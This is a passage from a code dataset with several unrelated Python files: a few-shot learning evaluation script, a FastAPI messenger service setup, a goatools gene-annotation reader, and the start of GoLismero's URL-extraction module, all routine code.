'Fungi', \n 'Plant_Disease', 'ISIC', 'EuroSAT', 'ChestX',\n 'Real', 'Sketch', 'Infograph', 'Painting', 'Clipart']\n\n\ndef parse_option():\n parser = argparse.ArgumentParser('argument for testing')\n\n # load pretrained model\n parser.add_argument('--backbone_name', type=str, default='resnet12', choices=backbones)\n parser.add_argument('--backbone_path', type=str, default=None, help='path to the pretrained backbone')\n parser.add_argument('--classifier_name', type=str, default='proto_head', choices=classifiers)\n\n # dataset\n parser.add_argument('--dataset_name', type=str, default='miniImageNet', choices=datasets)\n parser.add_argument('--dataset_root', type=str, default='', \n help='root directory of the dataset')\n parser.add_argument('--statistics_root', type=str, default='./data_statistics', \n help='(for oracle only) root to saved dataset statistics')\n \n\n\n # settings\n parser.add_argument('--num_task', type=int, default=2000,\n help='Number of tasks per run')\n parser.add_argument('--way', type=int, default=5,\n help='Number of classes per task')\n parser.add_argument('--shot', type=int, default=5,\n help='Number of support images per class')\n parser.add_argument('--num_query', type=int, default=15,\n help='Number of query images per class')\n parser.add_argument('--num_workers', type=int, default=4,\n help='Number of workers for dataloader')\n parser.add_argument('--batch_size', type=int, default=4,\n help='number of tasks per batch')\n parser.add_argument('--use_oracle', type=str, default=\"False\",\n help='whether use oracle transformation')\n\n opt = parser.parse_args()\n\n return opt\n\n\n\ndef compute_dataset_statistics(model, dataset_name, dataset, num_workers, statistics_root):\n dataloader = DataLoader(dataset, 128, shuffle=False, num_workers=num_workers, pin_memory=True)\n with torch.no_grad():\n class_features = collections.defaultdict(list)\n mean_ = []\n std_ = []\n num = []\n abs_mean = []\n print(\"calculating dataset statistics...\")\n for i, (data, labels) in enumerate(tqdm.tqdm(dataloader)):\n batch_size = data.size(0)\n data = data.cuda()\n \n labels = labels.cuda()\n data = model(data)\n data = F.adaptive_avg_pool2d(data, 1).squeeze_(-1).squeeze_(-1)\n data = F.normalize(data, p=2, dim=1, eps=1e-12)\n for j in range(batch_size):\n class_features[int(labels[j])].append(data[j])\n\n for class_, features in class_features.items():\n features = torch.stack(features)\n features = F.normalize(features, p=2, dim=1, eps=1e-12)\n features_abs = torch.abs(features)\n num.append(features.size(0))\n mean_.append(torch.mean(features, dim=0))\n abs_mean.append(torch.mean(features_abs, dim=0))\n std_.append(torch.std(features, dim=0))\n \n mean_ = torch.stack(mean_).cpu().numpy()\n np.save(os.path.join(statistics_root, \"meanof\"+dataset_name+\".npy\"),mean_)\n abs_mean = torch.stack(abs_mean).cpu().numpy()\n np.save(os.path.join(statistics_root, \"abs_meanof\"+dataset_name+\".npy\"),abs_mean)\n std_ = torch.stack(std_).cpu().numpy()\n np.save(os.path.join(statistics_root, \"stdof\"+dataset_name+\".npy\"),std_)\n num = np.array(num)\n np.save(os.path.join(statistics_root, \"numof\"+dataset_name+\".npy\"),num)\n\n\n\ndef main():\n args = parse_option()\n args.use_oracle = False if args.use_oracle == \"False\" else True\n\n\n if args.backbone_name == 'resnet50':\n resize_sz = 256\n crop_sz = 224\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n else:\n resize_sz = 92\n crop_sz = 84\n normalize = transforms.Normalize(mean=[0.4712, 
0.4499, 0.4031],\n std=[0.2726, 0.2634, 0.2794])\n\n transform = transforms.Compose([\n transforms.Resize([resize_sz, resize_sz]),\n transforms.CenterCrop(crop_sz),\n transforms.ToTensor(),\n normalize])\n\n #obtain dataset\n if args.dataset_name == 'miniImageNet':\n dataset = miniImageNet(args.dataset_root, transform)\n elif args.dataset_name == 'Aircraft':\n dataset = AircraftDataset(args.dataset_root, transform)\n elif args.dataset_name == 'Omniglot':\n dataset = omniglot(args.dataset_root, transform)\n elif args.dataset_name == 'VGG_Flower':\n dataset = OxfordFlowers102Dataset(args.dataset_root, transform)\n elif args.dataset_name == 'MSCOCO':\n dataset = coco(args.dataset_root, transform)\n elif args.dataset_name == 'ISIC':\n dataset = ISIC(args.dataset_root, transform)\n elif args.dataset_name == 'ChestX':\n dataset = Chest(args.dataset_root, transform)\n else:\n dataset = general_dataset(args.dataset_root, transform)\n\n # Logistic Regression passes single task\n if args.classifier_name == 'LR' or args.use_oracle == True:\n args.batch_size = 1\n\n\n model = get_backbone(args.backbone_name)\n state = torch.load(args.backbone_path)\n model.load_state_dict(state)\n if torch.cuda.is_available():\n model = model.cuda()\n\n model.eval()\n\n \n \n if args.use_oracle == True:\n args.way = 2# Oracle transformation is used under binary tasks\n if not os.path.exists(args.statistics_root):\n os.makedirs(args.statistics_root)\n if not os.path.exists(os.path.join(args.statistics_root,\"meanof\"+args.dataset_name+\".npy\")):\n compute_dataset_statistics(model, args.dataset_name, dataset, args.num_workers, args.statistics_root)\n \n if args.use_oracle:\n classifier = get_classifier(\n args.classifier_name, \n use_Oracle=True, \n statistics_root=args.statistics_root, \n dataset_name=args.dataset_name)\n else:\n classifier = get_classifier(args.classifier_name, use_Oracle=False)\n \n\n task_sampler = CategoriesSampler(dataset.label, args.num_task,\n args.way, args.shot+args.num_query, args.batch_size)\n\n data_loader = DataLoader(\n dataset,\n batch_size = 1,\n shuffle = False,\n num_workers = args.num_workers,\n batch_sampler = task_sampler,\n pin_memory = True\n )\n \n \n \n \n\n \n query_label = torch.arange(args.way, dtype=torch.int8).repeat(args.num_query)\n query_label = query_label.type(torch.LongTensor).reshape(-1)\n query_label = torch.unsqueeze(query_label, 0).repeat(args.batch_size, 1).reshape(-1)\n if torch.cuda.is_available():\n query_label = query_label.cuda()\n\n #None: original performance. 
Simple: performance using simple transformation\n\n\n acc_Nones = []\n acc_Simples = []\n if args.use_oracle == True:\n acc_Oracles = []\n data_loader_tqdm = tqdm.tqdm(data_loader)\n with torch.no_grad():\n for _, batch in enumerate(data_loader_tqdm, 1):\n data, labels = [_ for _ in batch]\n if args.use_oracle == True:\n all_labels = []\n for label in labels:\n j = int(label)\n if j not in all_labels:\n all_labels.append(j)\n if torch.cuda.is_available():\n data = data.cuda()\n num_support_samples = args.way * args.shot\n data = model(data)\n data = data.reshape([args.batch_size, -1] + list(data.shape[-3:]))\n data_support = data[:, :num_support_samples]\n data_query = data[:, num_support_samples:]\n\n logit_None = classifier(data_query, data_support, args.way, args.shot, False, False)\n logit_Simple = classifier(data_query, data_support, args.way, args.shot, True, False)\n\n if args.use_oracle == True:\n logit_Oracle = classifier(data_query, data_support, args.way, args.shot, False, True, all_labels)\n # print(logit_Oracle.shape)\n logit_Oracle = logit_Oracle.reshape(query_label.size(0),-1)\n acc_Oracle = count_acc(logit_Oracle, query_label) * 100\n acc_Oracles.append(acc_Oracle)\n\n logit_None = logit_None.reshape(query_label.size(0),-1)\n logit_Simple = logit_Simple.reshape(query_label.size(0),-1)\n\n acc_None = count_acc(logit_None, query_label) * 100\n acc_Simple = count_acc(logit_Simple, query_label) * 100\n acc_Nones.append(acc_None)\n acc_Simples.append(acc_Simple)\n\n \n mean_acc_Nones = np.mean(acc_Nones)\n confidence_interval_None = 1.96 * np.std(acc_Nones)/math.sqrt(len(acc_Nones))\n mean_acc_Simples = np.mean(acc_Simples)\n confidence_interval_Simple = 1.96 * np.std(acc_Simples)/math.sqrt(len(acc_Simples))\n if args.use_oracle == True:\n mean_acc_Oracles = np.mean(acc_Oracles)\n confidence_interval_Oracle = 1.96 * np.std(acc_Oracles)/math.sqrt(len(acc_Oracles))\n\n print(\"Average original accuracy with 95% confidence interval: {:.2f}% +- {:.2f}\".format(mean_acc_Nones, confidence_interval_None))\n print(\"Average accuracy using simple transformation with 95% confidence interval: {:.2f}% +- {:.2f}\".format(mean_acc_Simples, confidence_interval_Simple))\n if args.use_oracle == True:\n print(\"Average accuracy using oracle transformation with 95% confidence interval: {:.2f}% +- {:.2f}\".format(mean_acc_Oracles, confidence_interval_Oracle))\n \nif __name__ == '__main__':\n main()\n \n \n\n \n \n\n","repo_name":"Frankluox/Channel_Importance_FSL","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10824,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"75"} +{"seq_id":"73297226162","text":"from socketio import AsyncRedisManager\nimport uvicorn\nfrom fastapi import Depends\nfrom fastapi import FastAPI\nfrom opencensus.trace.samplers import AlwaysOnSampler\nfrom starlette.middleware.cors import CORSMiddleware\nfrom starlette.middleware.trustedhost import TrustedHostMiddleware\nfrom starlette_exporter import PrometheusMiddleware\nfrom starlette_exporter import handle_metrics\nfrom smsaero.client import SMSAero\n\nfrom app.exceptions.binding import setup_exception_handlers\nfrom app.i18n.tr import get_locale\nfrom app.services.ipwhois.client import IPWhoisClient\nfrom app.services.ipwhois.dependencies import IPWhoisClientMarker\nfrom app.services.smsaero.dependencies import SMSAeroDependencyMarker\nfrom app.services.redis.queue.client import RedisSocketQueue\nfrom app.services.redis.queue.dependencies import (\n 
RedisSocketQueueDependencyMarker,\n)\nfrom app.utils.logging.middlewares import LoggingMiddleware\nfrom app.utils.logging.middlewares import OpenCensusFastAPIMiddleware\nfrom app.v1.binding import own_router_v1\nfrom app.v1.conversations.chats.dependencies import ChatDependencyMarker\nfrom app.v1.conversations.chats.repo import ChatRepository\nfrom app.v1.conversations.messages.dependencies import MessageDependencyMarker\nfrom app.v1.conversations.messages.dependencies import (\n MessageServiceDependencyMarker,\n)\nfrom app.v1.conversations.messages.repo import MessageRepository\nfrom app.v1.conversations.messages.services import MessageService\nfrom app.v1.security.dependencies import UserSessionDependencyMarker\nfrom app.v1.security.repo import UserSessionRepository\nfrom app.v1.security.services import UserSessionService\nfrom app.v1.users.dependencies import UsersDependencyMarker\nfrom app.v1.users.services import UserService\nfrom config import BaseSettingsMarker\nfrom config import HTTPAuthSettings\nfrom config import HTTPAuthSettingsMarker\nfrom config import OtherServicesSettings\nfrom config import OtherServicesSettingsMarker\nfrom config import Settings\nfrom config import settings_app\nfrom config import settings_redis\nfrom config import settings_sensus_app\nfrom config import settings_services\nfrom misc import async_session\n\n\n# dictConfig(settings_sensus_app.log_config)\n# logger = logging.getLogger(__name__)\n\n\ndef get_application_v1() -> FastAPI:\n application = FastAPI(\n debug=False,\n docs_url=None,\n openapi_url=\"/api/v1/openapi.json\",\n title=\"CapiMessanger Microservice\",\n version=\"1.2.15\",\n root_path=\"/api/v1\",\n dependencies=[Depends(get_locale)],\n )\n application.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n\n application.add_middleware(TrustedHostMiddleware, allowed_hosts=[\"*\"])\n application.add_middleware(\n PrometheusMiddleware,\n app_name=\"v1\",\n skip_paths=[\"/api/v1/docs\", \"/api/v1/__metrics\"],\n )\n\n if settings_app.LOGGING:\n application.middleware(\"http\")(LoggingMiddleware())\n if settings_sensus_app.ENABLE_TELEMETRY:\n application.middleware(\"http\")(\n OpenCensusFastAPIMiddleware(\n application, sampler=AlwaysOnSampler()\n )\n )\n\n application.dependency_overrides.update(\n {\n UsersDependencyMarker: lambda: UserService(\n db_session=async_session\n ),\n UserSessionDependencyMarker: lambda: UserSessionService(\n repo=UserSessionRepository(db_session=async_session),\n sms_aero=SMSAero(\n email=settings_services.SMSAERO_EMAIL,\n api_key=settings_services.SMSAERO_API_KEY,\n ),\n whois=IPWhoisClient(api_key=settings_services.IPWHOIS_API),\n ),\n HTTPAuthSettingsMarker: lambda: HTTPAuthSettings(),\n BaseSettingsMarker: lambda: Settings(),\n OtherServicesSettingsMarker: lambda: OtherServicesSettings(),\n SMSAeroDependencyMarker: lambda: SMSAero(\n email=settings_services.SMSAERO_EMAIL,\n api_key=settings_services.SMSAERO_API_KEY,\n ),\n IPWhoisClientMarker: lambda: IPWhoisClient(\n api_key=settings_services.IPWHOIS_API\n ),\n ChatDependencyMarker: lambda: ChatRepository(\n db_session=async_session\n ),\n MessageDependencyMarker: lambda: MessageRepository(\n db_session=async_session\n ),\n RedisSocketQueueDependencyMarker: lambda: RedisSocketQueue(\n mgr=AsyncRedisManager(\n url=settings_redis.dsn(\n host=settings_redis.REDIS_HOST,\n port=settings_redis.REDIS_PORT,\n database=settings_redis.REDIS_DB_QUEUE,\n 
user=settings_redis.REDIS_USER,\n password=settings_redis.REDIS_PWD,\n ),\n channel=settings_redis.REDIS_DB_QUEUE_CHANNEL,\n )\n ),\n }\n )\n application.dependency_overrides.update(\n {\n MessageServiceDependencyMarker: lambda: MessageService(\n repo=application.dependency_overrides.get(\n MessageDependencyMarker\n )(),\n redis=application.dependency_overrides.get(\n RedisSocketQueueDependencyMarker\n )(),\n ),\n }\n )\n application.include_router(own_router_v1)\n application = setup_exception_handlers(app=application)\n return application\n\n\ndef get_parent_app() -> FastAPI:\n tags_metadata = [\n {\n \"name\": \"v1\",\n \"description\": \"Версия API - v1. Нажмите справа для перехода в документацию\",\n \"externalDocs\": {\n \"description\": \"дополнительная документация\",\n \"url\": f\"https://{settings_app.BASE_DOMAIN}/api/v1/docs\",\n },\n },\n ]\n\n application = FastAPI(\n openapi_tags=tags_metadata,\n )\n\n application.mount(\"/api/v1\", get_application_v1())\n application.add_route(\"/__metrics\", handle_metrics)\n\n return application\n\n\napp = get_parent_app()\n\nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", port=10100, reload=True)\n","repo_name":"capiorg/backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"19599220890","text":"\"\"\"Read an Association File and store the data in a Python object.\"\"\"\n\nimport sys\nimport timeit\nimport datetime\nimport collections as cx\nfrom goatools.evidence_codes import EvidenceCodes\nfrom goatools.anno.opts import AnnoOptions\nfrom goatools.godag.consts import Consts\n\n__copyright__ = \"Copyright (C) 2016-2019, DV Klopfenstein, H Tang. All rights reserved.\"\n__author__ = \"DV Klopfenstein\"\n\n\nclass AnnoReaderBase(object):\n \"\"\"Reads a Gene Association File. 
Returns a Python object.\"\"\"\n # pylint: disable=broad-except,line-too-long,too-many-instance-attributes\n\n tic = timeit.default_timer()\n\n # Expected values for a Qualifier\n exp_qualifiers = set([\n # Seen in both GAF and gene2go\n 'not', 'contributes_to', 'colocalizes_with',\n ])\n\n valid_formats = {'gpad', 'gaf', 'gene2go', 'id2gos'}\n\n exp_nss = set(['BP', 'MF', 'CC'])\n\n # pylint: disable=too-many-instance-attributes\n def __init__(self, name, filename=None, **kws):\n # kws: allow_missing_symbol\n self.name = name # name is one of valid_formats\n self.filename = filename\n self.godag = kws.get('godag')\n self.namespaces = kws.get('namespaces')\n self.evobj = EvidenceCodes()\n # Read anotation file, store namedtuples:\n # Gene2GoReader(filename=None, taxids=None):\n # GafReader(filename=None, hdr_only=False, prt=sys.stdout, allow_missing_symbol=False):\n # GpadReader(filename=None, hdr_only=False):\n self.hdr = None\n self.datobj = None\n # pylint: disable=no-member\n self.associations = self._init_associations(filename, **kws)\n # assert self.associations, 'NO ANNOTATIONS FOUND: {ANNO}'.format(ANNO=filename)\n assert self.namespaces is None or isinstance(self.namespaces, set)\n\n def get_desc(self):\n \"\"\"Get description\"\"\"\n return '{NAME} {NSs} {GODAG}'.format(\n NAME=self.name,\n NSs='' if self.namespaces is None else ','.join(self.namespaces),\n GODAG='' if self.godag is None else 'godag')\n\n # pylint: disable=unused-argument\n def get_associations(self, taxid=None):\n \"\"\"Get associations\"\"\"\n # taxid is for NCBI's gene2gos\n return self.associations\n\n def prt_summary_anno2ev(self, prt=sys.stdout):\n \"\"\"Print annotation/evidence code summary.\"\"\"\n self.evobj.prt_summary_anno2ev(self.associations, prt)\n\n def get_name(self):\n \"\"\"Return type of annotation\"\"\"\n return self.name\n\n # pylint: disable=no-self-use\n def get_taxid(self):\n \"\"\"Return taxid, if one was provided, otherwise return -1\"\"\"\n return -1\n\n def get_ns2assc(self, **kws):\n \"\"\"Return given associations into 3 (BP, MF, CC) dicts, id2gos\"\"\"\n return {ns:self._get_id2gos(nts, **kws) for ns, nts in self.get_ns2ntsanno(kws.get('taxid')).items()}\n\n # pylint: disable=unused-argument\n def get_ns2ntsanno(self, taxid=None):\n \"\"\"Split list of annotations into 3 lists: BP, MF, CC\"\"\"\n return self._get_ns2ntsanno(self.associations)\n\n def _get_ns2ntsanno(self, annotations):\n \"\"\"Split list of annotations into 3 lists: BP, MF, CC\"\"\"\n if self.name in {'gpad', 'id2gos'}:\n assert self.godag is not None, \"{T}: LOAD godag TO USE {C}::ns2ntsanno\".format(\n C=self.__class__.__name__, T=self.name)\n ns2nts = cx.defaultdict(list)\n for nta in annotations:\n ns2nts[nta.NS].append(nta)\n return {ns:ns2nts[ns] for ns in self.exp_nss.intersection(ns2nts)}\n\n def get_id2gos_nss(self, **kws):\n \"\"\"Return all associations in a dict, id2gos, regardless of namespace\"\"\"\n return self._get_id2gos(self.associations, **kws)\n\n #### def get_id2gos(self, namespace='BP', **kws):\n #### \"\"\"Return associations from specified namespace in a dict, id2gos\"\"\"\n #### # pylint: disable=superfluous-parens\n #### if self.has_ns():\n #### assoc = [nt for nt in self.associations if nt.NS == namespace]\n #### id2gos = self._get_id2gos(assoc, **kws)\n #### print('{N} IDs in loaded association branch, {NS}'.format(N=len(id2gos), NS=namespace))\n #### return id2gos\n #### print('**ERROR get_id2gos: GODAG NOT LOADED. 
IGNORING namespace({NS})'.format(NS=namespace))\n #### id2gos = self._get_id2gos(self.associations, **kws)\n #### print('{N} IDs in association branch, {NS}'.format(N=len(id2gos), NS=namespace))\n #### return id2gos\n\n def get_id2gos(self, namespace=None, **kws):\n \"\"\"Return associations from specified namespace in a dict, id2gos\"\"\"\n # pylint: disable=superfluous-parens\n if self.has_ns(): # Anno namedtuple has NS field\n nspc, assoc = self._get_1ns_assn(namespace)\n id2gos = self._get_id2gos(assoc, **kws)\n print('{N} IDs in loaded association branch, {NS}'.format(N=len(id2gos), NS=nspc))\n return id2gos\n if namespace is not None:\n print('**ERROR get_id2gos: GODAG NOT LOADED. IGNORING namespace({NS})'.format(NS=namespace))\n id2gos = self._get_id2gos(self.associations, **kws)\n print('{N} IDs in all associations'.format(N=len(id2gos)))\n return id2gos\n\n def _get_1ns_assn(self, namespace_usr):\n \"\"\"Get one namespace, given a user-provided namespace or a default\"\"\"\n # If all namespaces were loaded\n if self.namespaces is None:\n # Return user-specified namespace, if provided. Otherwise BP\n nspc = 'BP' if namespace_usr is None else namespace_usr\n # Return one namespace\n if nspc in set(Consts.NAMESPACE2NS.values()):\n return nspc, [nt for nt in self.associations if nt.NS == nspc]\n # Return all namespaces\n return nspc, self.associations\n # If one namespace was loaded, use that regardless of what user specfies\n if len(self.namespaces) == 1:\n nspc = next(iter(self.namespaces))\n if namespace_usr is not None and nspc != namespace_usr:\n print('**WARNING: IGNORING {ns}; ONLY {NS} WAS LOADED'.format(\n ns=namespace_usr, NS=nspc))\n return nspc, self.associations\n if namespace_usr is None:\n print('**ERROR get_id2gos: GODAG NOT LOADED. USING: {NSs}'.format(\n NSs=' '.join(sorted(self.namespaces))))\n return namespace_usr, self.associations\n\n def has_ns(self):\n \"\"\"Return True if namespace field, NS exists on annotation namedtuples\"\"\"\n return hasattr(next(iter(self.associations)), 'NS')\n\n def _get_id2gos(self, associations, **kws):\n \"\"\"Return given associations in a dict, id2gos\"\"\"\n options = AnnoOptions(self.evobj, **kws)\n # Default reduction is to remove. For all options, see goatools/anno/opts.py:\n # * Evidence_Code == ND -> No biological data No biological Data available\n # * Qualifiers contain NOT\n assc = self.reduce_annotations(associations, options)\n a2bs = self.get_dbid2goids(assc) if options.b_geneid2gos else self.get_goid2dbids(assc)\n # if not a2bs:\n # raise RuntimeError('**ERROR: NO ASSOCATIONS FOUND: {FILE}'.format(FILE=self.filename))\n return a2bs\n\n def _get_namespaces(self, nts):\n \"\"\"Get the set of namespaces seen in the namedtuples.\"\"\"\n return set(nt.NS for nt in nts) if self.has_ns() else set()\n\n # Qualifier (column 4)\n # Flags that modify the interpretation of an annotation one (or more) of NOT, contributes_to, colocalizes_with\n # This field is not mandatory;\n # * cardinality 0, 1, >1;\n # * for cardinality >1 use a pipe to separate entries (e.g. 
NOT|contributes_to)\n def prt_qualifiers(self, prt=sys.stdout):\n \"\"\"Print Qualifiers: 1,462 colocalizes_with; 1,454 contributes_to; 1,157 not\"\"\"\n # 13 not colocalizes_with (TBD: CHK - Seen in gene2go, but not gafs)\n # 4 not contributes_to (TBD: CHK - Seen in gene2go, but not gafs)\n self._prt_qualifiers(self.associations, prt)\n\n @staticmethod\n def _prt_qualifiers(associations, prt=sys.stdout):\n \"\"\"Print Qualifiers found in the annotations.\n QUALIFIERS:\n 1,462 colocalizes_with\n 1,454 contributes_to\n 1,157 not\n 13 not colocalizes_with (TBD: CHK - Seen in gene2go, but not gafs)\n 4 not contributes_to (TBD: CHK - Seen in gene2go, but not gafs)\n \"\"\"\n prt.write('QUALIFIERS:\\n')\n for fld, cnt in cx.Counter(q for nt in associations for q in nt.Qualifier).most_common():\n prt.write(' {N:6,} {FLD}\\n'.format(N=cnt, FLD=fld))\n\n def reduce_annotations(self, annotations, options):\n \"\"\"Reduce annotations to ones used to identify enrichment (normally exclude ND and NOT).\"\"\"\n getfnc_qual_ev = options.getfnc_qual_ev()\n return [nt for nt in annotations if getfnc_qual_ev(nt.Qualifier, nt.Evidence_Code)]\n\n @staticmethod\n def get_dbid2goids(associations):\n \"\"\"Return gene2go data for user-specified taxids.\"\"\"\n id2gos = cx.defaultdict(set)\n for ntd in associations:\n id2gos[ntd.DB_ID].add(ntd.GO_ID)\n return dict(id2gos)\n\n @staticmethod\n def get_goid2dbids(associations):\n \"\"\"Return gene2go data for user-specified taxids.\"\"\"\n go2ids = cx.defaultdict(set)\n for ntd in associations:\n go2ids[ntd.GO_ID].add(ntd.DB_ID)\n return dict(go2ids)\n\n def hms(self, msg, tic=None, prt=sys.stdout):\n \"\"\"Print elapsed time and message.\"\"\"\n if tic is None:\n tic = self.tic\n now = timeit.default_timer()\n hms = str(datetime.timedelta(seconds=(now-tic)))\n prt.write('{HMS}: {MSG}\\n'.format(HMS=hms, MSG=msg))\n return now\n\n def chk_associations(self, fout_err=None):\n \"\"\"Check that associations are in expected format.\"\"\"\n pass\n\n def nts_ev_nd(self):\n \"\"\"Get annotations where Evidence_code == 'ND' (No biological data)\"\"\"\n return [nt for nt in self.associations if nt.Evidence_Code == 'ND']\n\n def nts_qual_not(self):\n \"\"\"Get annotations having Qualifiers containing NOT\"\"\"\n return [nt for nt in self.associations if self._has_not_qual(nt)]\n\n def chk_qualifiers(self):\n \"\"\"Check format of qualifier\"\"\"\n if self.name == 'id2gos':\n return\n for ntd in self.associations:\n # print(ntd)\n qual = ntd.Qualifier\n assert isinstance(qual, set), '{NAME}: QUALIFIER MUST BE A LIST: {NT}'.format(\n NAME=self.name, NT=ntd)\n assert qual != set(['']), ntd\n assert qual != set(['-']), ntd\n assert 'always' not in qual, 'SPEC SAID IT WOULD BE THERE'\n\n @staticmethod\n def _has_not_qual(ntd):\n \"\"\"Return True if the qualifiers contain a 'NOT'\"\"\"\n for qual in ntd.Qualifier:\n if 'not' in qual:\n return True\n if 'NOT' in qual:\n return True\n return False\n\n\n\n# Copyright (C) 2016-2019, DV Klopfenstein, H Tang. 
All rights reserved.\"\n","repo_name":"AlexPersa7/goatools","sub_path":"goatools/anno/annoreader_base.py","file_name":"annoreader_base.py","file_ext":"py","file_size_in_byte":11245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"39281851292","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nURL scraping API.\n\nThis module contains utility functions to extract (scrape) URLs from data.\nCurrently only HTML and plain text data are supported.\n\"\"\"\n\n__license__ = \"\"\"\nGoLismero 2.0 - The web knife - Copyright (C) 2011-2014\n\nGolismero project site: https://github.com/golismero\nGolismero project mail: contact@golismero-project.com\n\nThis program is free software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License\nas published by the Free Software Foundation; either version 2\nof the License, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\"\"\"\n\n__all__ = [\n\n # Generic entry point.\n \"extract\",\n\n # Specific parsers for each data format.\n \"extract_from_text\",\n \"extract_from_html\",\n\n # Helper functions.\n \"is_link\",\n]\n\nfrom .web_utils import parse_url, urldefrag, urljoin\n\nfrom BeautifulSoup import BeautifulSoup\nfrom warnings import warn\n\nimport re\nfrom codecs import decode\nfrom chardet import detect\n\n\n#------------------------------------------------------------------------------\n# URL detection regex, by John Gruber.\n# http://daringfireball.net/2010/07/improved_regex_for_matching_urls\n_re_url_readable = re.compile(r\"\"\"(?i)\\b((?:[a-z][\\w-]+:(?:/{1,3}|[a-z0-9%])|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\".,<>?«»“”‘’]))\"\"\", re.I)\n\n\n#------------------------------------------------------------------------------\n# Wrappers for URIs in plain text\n# http://www.w3.org/Addressing/URL/url-spec.txt\n_re_url_rfc = re.compile(r\"\"\"\\\\<([^\\\\>]+\\\\:\\\\/\\\\/[^\\\\>]+)\\\\>\"\"\", re.I)\n\n\n#------------------------------------------------------------------------------\ndef is_link(url, base_url):\n \"\"\"\n Determines if an URL is a link to another resource.\n\n :param url: URL to test.\n :type url: str\n\n :param base_url: Base URL for the current document.\n Must not contain a fragment.\n :type base_url: str\n\n :returns: True if the URL points to another page or resource,\n False otherwise.\n :rtype: bool\n \"\"\"\n try:\n\n # Parse the URL. 
If it can't be parsed, it's not a link.\n parsed = parse_url(url, base_url)\n\n # URLs that point to the same page\n # in a different fragment are not links.\n parsed.fragment = \"\"\n if parsed.url == base_url:\n return False\n\n # All other URLs are links.\n return True\n\n # On any parsing error assume it's not a link.\n except Exception:\n return False\n\n\n#------------------------------------------------------------------------------\ndef extract_from_text(text, base_url = None, only_links = True):\n \"\"\"\n Extract URLs from text.\n\n Implementation notes:\n\n - Unicode URLs are currently not supported.\n\n :param text: Text.\n :type text: str\n\n :param base_url: Base URL for the current document.\n If not specified, relative URLs are ignored.\n :type base_url: str\n\n :param only_links: If True, only extract links to other resources.\n If False, extract all URLs.\n :type only_links: bool\n\n :returns: Extracted URLs.\n :rtype: set(str)\n \"\"\"\n\n # Trivial case.\n if not text:\n return set()\n\n # Check the type.\n if not isinstance(text, basestring):\n raise TypeError(\"Expected string, got %r instead\" % type(text))\n\n # Set where the URLs will be collected.\n result = set()\n\n # Remove the fragment from the base URL.\n if base_url:\n base_url = urldefrag(base_url)[0]\n\n # Look for URLs using regular expressions.\n for regex in (_re_url_rfc, _re_url_readable):\n for url in regex.findall(text):\n url = url[0]\n\n # Skip if we've already seen it.\n if url in result:\n continue\n\n # XXX FIXME\n # Make sure the text is really ASCII text.\n # We don't support Unicode yet.\n try:\n url = str(url)\n except Exception:\n warn(\"Unicode URLs not yet supported: %r\" % url)\n continue\n\n # If a base URL was given...\n if base_url:\n\n # Canonicalize the URL.\n # Discard it on parse error.\n try:\n url = urljoin(base_url, url.strip())\n except Exception:\n continue\n\n # Skip if we've already seen it.\n if url in result:\n continue\n\n # Discard URLs that are not links to other pages or resources,\n # and URLs we've already seen.\n if only_links and (url in result or\n not is_link(url, base_url = base_url)):\n continue\n\n # If a base URL was NOT given...\n else:\n\n # Discard relative URLs.\n # Also discard them on parse error.\n try:\n parsed = parse_url(url)\n if not parsed.scheme or not parsed.netloc:\n continue\n except Exception:\n raise\n continue\n\n # Add the URL to the set.\n result.add(url)\n\n # Return the set of collected URLs.\n return result\n\n\n#------------------------------------------------------------------------------\ndef extract_forms_from_html(raw_html, base_url):\n \"\"\"\n Extract forms info from HTML.\n\n :param raw_html: Raw HTML data.\n :type raw_html: str\n\n :param base_url: Base URL for the current document.\n :type base_url: str\n\n :returns: Extracted form info.\n :rtype: list((URL, METHOD, list({ \"name\" : PARAM_NAME, \"value\" : PARAM_VALUE, \"type\" : PARAM_TYPE})))\n \"\"\"\n\n # Set where the URLs will be collected.\n result = list()\n result_append = result.append\n\n # Remove the fragment from the base URL.\n base_url = urldefrag(base_url)[0]\n\n # Parse the raw HTML.\n bs = BeautifulSoup(decode(raw_html, detect(raw_html)[\"encoding\"]))\n\n for form in bs.findAll(\"form\"):\n target = form.get(\"action\", None)\n method = form.get(\"method\", \"POST\").upper()\n\n if not target:\n continue\n\n try:\n target = str(target)\n except Exception:\n warn(\"Unicode URLs not yet supported: %r\" % target)\n continue\n\n # Canonicalize the URL.\n 
